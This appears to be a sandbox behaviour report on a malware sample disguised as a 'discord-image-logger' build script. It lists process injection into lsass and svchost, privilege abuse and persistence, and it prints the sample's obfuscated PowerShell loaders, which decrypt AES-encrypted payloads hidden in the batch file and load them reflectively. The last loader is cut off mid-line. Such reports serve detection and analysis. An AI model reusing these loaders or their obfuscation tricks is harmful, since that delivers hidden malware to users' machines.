Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1C02EF6E-D517-42E5-B941-AAC38BBE66CE}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4568 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4568 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2040 wrote to memory of 2076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2040 wrote to memory of 2076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4568 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
PID 4568 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
PID 2176 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 2176 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 2176 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 2176 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 2176 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 2176 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 2176 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 2176 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\$sxr-powershell.exe
PID 2176 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\$sxr-powershell.exe
PID 3468 wrote to memory of 2356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 2356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 2356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 2356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 2356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 2356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 2356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 3640 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3468 wrote to memory of 3640 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3468 wrote to memory of 1700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1700 wrote to memory of 620 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1700 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1700 wrote to memory of 964 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 376 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 1700 wrote to memory of 404 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1032 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 1040 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1124 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 1172 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1180 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 1292 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1360 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1368 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1488 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1560 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1568 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 1600 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 1732 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1768 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 1788 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 1872 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 2004 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 2012 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 1228 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 1644 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1700 wrote to memory of 2112 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 2252 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 1700 wrote to memory of 2288 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 2460 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1700 wrote to memory of 2596 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe

"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d7989f00-d923-44a3-b032-28fd257c95ca}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = 